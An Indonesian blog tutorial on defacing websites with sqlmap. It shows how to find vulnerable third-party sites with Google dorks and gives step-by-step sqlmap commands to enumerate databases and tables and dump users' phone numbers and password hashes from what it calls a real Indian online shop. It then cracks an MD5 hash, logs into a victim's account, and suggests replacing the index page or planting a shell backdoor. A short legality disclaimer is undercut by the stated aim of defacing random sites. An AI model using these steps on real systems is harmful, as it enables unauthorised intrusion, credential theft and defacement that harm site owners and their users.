Laporkan Jika Terdapat Bug! Contact Us Report!

Cara Deface SQLMAP 2023

Cara Deface SQLMAP 2023

 


Cara Deface Sqlmap 2023

Halo gengs kembali lagi sama gua Gim!

Pada Artikel kali ini, gua akan share metode deface yang banyak juga digunakan oleh Hacker, karena teknik deface ini menyerang tertuju pada database sebuah website!

Pembahasan

SQLMap adalah sebuah alat (tool) yang digunakan untuk melakukan penetrasi pengujian terhadap kerentanan keamanan pada aplikasi web yang menggunakan teknologi database berbasis SQL (Structured Query Language). Alat ini dapat mendeteksi dan mengeksploitasi kerentanan injeksi SQL (SQL injection) yang ada pada aplikasi web tersebut. SQLMap dirancang untuk membantu para pengembang aplikasi web maupun peneliti keamanan dalam mengidentifikasi kerentanan SQL injection yang dapat mengeksploitasi kelemahan keamanan tersebut.

Dengan menggunakan SQLMap, pengguna dapat mengotomatisasi proses pengujian kerentanan injeksi SQL pada aplikasi web. Alat ini menyediakan berbagai opsi dan fitur yang berguna, seperti pemindaian struktur database, pengambilan data sensitif, peretasan hash kata sandi, dan banyak lagi. SQLMap dapat digunakan dalam mode interaktif melalui antarmuka baris perintah (command-line interface) atau melalui skrip Python.

Sebenarnya, SQLMap hanya boleh digunakan untuk tujuan yang sah dan dengan izin dari pemilik sistem yang akan diuji. Penggunaan SQLMap tanpa izin pada aplikasi web yang tidak Anda miliki adalah ilegal dan dapat dikenakan tindakan hukum. Namun pada nyatanya, banyak Hacker/Defacer yang menyalahgunakan SQLMAP ini untuk melakukan Hacking/Defacing.

Itulah penjelasan singkat mengenai SQLMAP!

Oke langsung aja, simak tutorial dibawah ini!

Tutorial

Pertama" yang kalian butuhkan yaitu Termux atau bisa juga menggunakan CMD yang sudah terinstal kode python dan git. Pada tutorial kali ini gua menggunakan terminal ubuntu, seperti gambar dibawah ini!


Note: untuk deface kali ini pada terminal termux/cmd dll harus install python terlebih dahulu

yang kedua kalian ketikan git clone https://github.com/sqlmapproject/sqlmap.git pada terminal kalian. seperti pada gambar dibawah ini!



Setelah itu kalian ketikan ls 

kemudian ketikan cd sqlmap


selanjutnya kalian buka browser kalian, lalu cari target web yang vuln! menggunakan dork seperti dibawah ini!

Dork:
inurl /product.php?id=2205
inurl index.php id=1
inurl news.php id=10
inurl news.php id=2
inurl berita_detail.php id=2

Kalian search dork kemudain pilih salah satu target. seperti dibawah ini!



target gua kali ini salah satu website online shop dari india. pada gambar dibawah ini!



https://target.com/product.php?id=44 Pada target kali ini nomer togel sql yaitu id=44

selanjutnya kita eksekusi!

ketikan python2 sqlmap.py -u https://target.com/product.php?id=44 --dbs pada terminal

"--dbs" adalah opsi yang digunakan dalam perintah SQLMap untuk menampilkan daftar database yang terdeteksi pada target yang ditentukan. Ketika Anda menjalankan SQLMap dengan opsi "--dbs", alat tersebut akan melakukan pemindaian pada aplikasi web untuk mencari kerentanan SQL injection dan kemudian mencoba mengidentifikasi database yang digunakan oleh aplikasi tersebut.

SQLMap akan mengirimkan serangkaian permintaan dan mengamati tanggapan dari aplikasi web. Jika ada tanda-tanda kerentanan SQL injection, SQLMap akan mencoba menjalankan serangkaian serangan dan menggunakan teknik pengujian untuk mengidentifikasi database yang digunakan. Opsi "--dbs" akan meminta SQLMap untuk menampilkan daftar database yang berhasil terdeteksi.

sqlmap -u <URL Target> --dbs

seperti pada gambar dibawah ini!


Setelah klik enter maka proses untuk mendapatkan info lewat sqlmap akan berjalan. Seperti pada gambar dibawah ini!


Jika muncul pernyataan seperti diatas "testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ec1ce2b8955...c866f44ff7'). Do you want to use those [Y/n]" Maka ketik Y.

Maka akan muncul paramter id (Get) dan fetching database name akan terlihat. Seperti pada gambar dibawah ini!

Data Berupa Parameter, Type, Title, dan columns
Terlihat pada data mysql dibawah ini terdapat 18 columns union query. kita bisa menggunakan 18 kolom ini untuk inject metode sql manual.


Setelah itu terdapat langsung nama database nya "Fetching database names available databases [2]:"
Terdapat 2 database name yaitu information_schema dan ruralbab_rural_db_rssc. Database yang benar itu adalah nomor 2 ruralbab_rural_db_rssc 

nah sekarang kita akan bongkar isi dari semua database website nya dengan berbentuk tabel atau kolom. Selanjutnya ketikan pada terminal 

python2 sqlmap.py -u https://target.com/product.php?id=44 -D ruralbab_rural_db_rssc --tables

Setelah alamat url masukan functions -D yang berarti -D = Database, kemudain masukan database yang nomor 2 tadi seperti pada contoh database yang gua dapet yaitu ruralbab_rural_db_rssc Akhiri dengan --tables yang berarti kita membongkar database nya berbentuk tabel. Seperti gambar dibawah ini!


Setelah klik enter maka akan muncul seperti ini!
kemudian ketik y lagi lalu enter

Maka akan muncul semua database webnya berbentuk tabel, seperti dibawah ini!
Berikut adalah gambar tabel database yang dimiliki oleh website yang gua dapet. Kita bisa lihat satu satu data yang ada didatabasenya. Namun perlu diingat tidak semua data pada tabel database seperti gambar dibawah ini dapat di buka. Adapun database yang tidak bisa dibuka, hal ini terjadi apabila admin atau pemilik websitenya mengunci database nya atau juga memasang security pada database mysqlnya.

Pada kali ini gua akan buka tabel users!


Untuk membuka dan melihat data users, ketikan "python2 sqlmap.py -u https://target.com/product.php?id=44 -D ruralbab_rural_db_rssc -T users --columns"

-T              = Merupakan nama tabel
users         = Merupakan nama data yang ada didalam database
--columns = Dalam bentuk kolom

Setelah klik Enter maka akan terlihat data kolom pada akun users, seperti pada gambar dibawah ini!
Kita bisa melihat data berupa password, status, address, mobile, user id dan lain-lain.


Karena ditarget gua itu login nya pake nomer hp atau mobile dan password, maka disini gua crack database kolom user yang mobile dan password nya saja!


Oke..selanjutnya untuk membuka data kolom mobile dan password pada tabel user ketikan command seperti berikut : 

" python2 sqlmap.py -u https://target.com/product.php?id=44 -D ruralbab_rural_db_rssc -T users -C mobile,password --dump "

-C = Digunakan untuk menentukan kolom yang akan diekstraksi selama serangan SQL Injection. Opsi ini memungkinkan untuk menentukan kolom yang ingin ambil dari tabel yang terkena serangan.

untuk menyertakan data dalam tabel user dengan data lainnya harus disertakan tanda koma. Semisal mobile,password atau email,password dll.

Opsi "--dump" pada SQLMap digunakan untuk mengekstraksi data yang ditemukan selama serangan SQL Injection. Opsi ini memungkinkan kita untuk mengambil data yang tersimpan dalam tabel yang terkena serangan dan menampilkannya dalam bentuk yang dapat dibaca.



Setelah itu klik Enter. Jika vuln maka data akan tampil seperti yang gua crack dibawah ini. Terdapat beberapa Mobile dan Password yang berhasil di crack!


oke di database yang gua crack ini bentuk password nya telah di encode menjadi md5. Mungkin diubah oleh admin nya supaya aman. Kalo kalian menemukan password atau user yang di encode baik itu md5 atau base64 dan sejenisnya, kalian tinggal decode saja!
Cara decode nya kalian buka web browser terus search misal "Decoded MD5 online tools to text" pilih salah satu webnya, terus kalian paste lalu konvert. Seperti pada contoh dibawah ini!

Bentuk Password MD5!

Gw coba Decode satu password MD5 "e0c295b1cfe902936a4d9fb35d1a0a29 "


Kalian bisa buka web encode/decode, yang gua pakai yaitu web ini https://md5decrypt.net/ 
Selanjutnya paste kemudian klik Decrypt



Maka akan tampil passwordnya seperti dibawah ini!


Oke passwordnya sudah berhasil didecoded!



Berhasil untuk login kedalam salah satu akun user! didalam akun user jika terdapat celah atau filemanager. Kalian bisa tebas indexnya atau menanam shellbackdoor didalamnya!

Pada metode deface sqlmap kali ini, perlu diingat bahwa tidak semua website itu bisa di crack databasenya, ada juga website yang memang databasenya dikunci atau diamankan oleh security. Maka dari itu sebaiknya jika tidak bisa, coba web target yang lain, dengan menggunakan dork tadi untuk mencari beberapa website yang memang vuln dan bisa di crack!

Mungkin itu saja beberapa penjelasan mengenai teknik atau metode deface yang sering digunakan oleh Hacker dalam melakukan defacing pada beberapa website!


Jangan lupa untuk lihat artikel kami di beranda ya!
Sekian dan Terima Kasih!






Rate this article

Loading...
I am a student who has a hobby of writing articles and blogs I am a student who has a hobby of writing articles and blogs

Post a Comment

Cookies Consent

This website uses cookies to ensure you get the best experience on our website.

Cookies Policy

We employ the use of cookies. By accessing Lantro UI, you agreed to use cookies in agreement with the Lantro UI's Privacy Policy.

Most interactive websites use cookies to let us retrieve the user’s details for each visit. Cookies are used by our website to enable the functionality of certain areas to make it easier for people visiting our website. Some of our affiliate/advertising partners may also use cookies.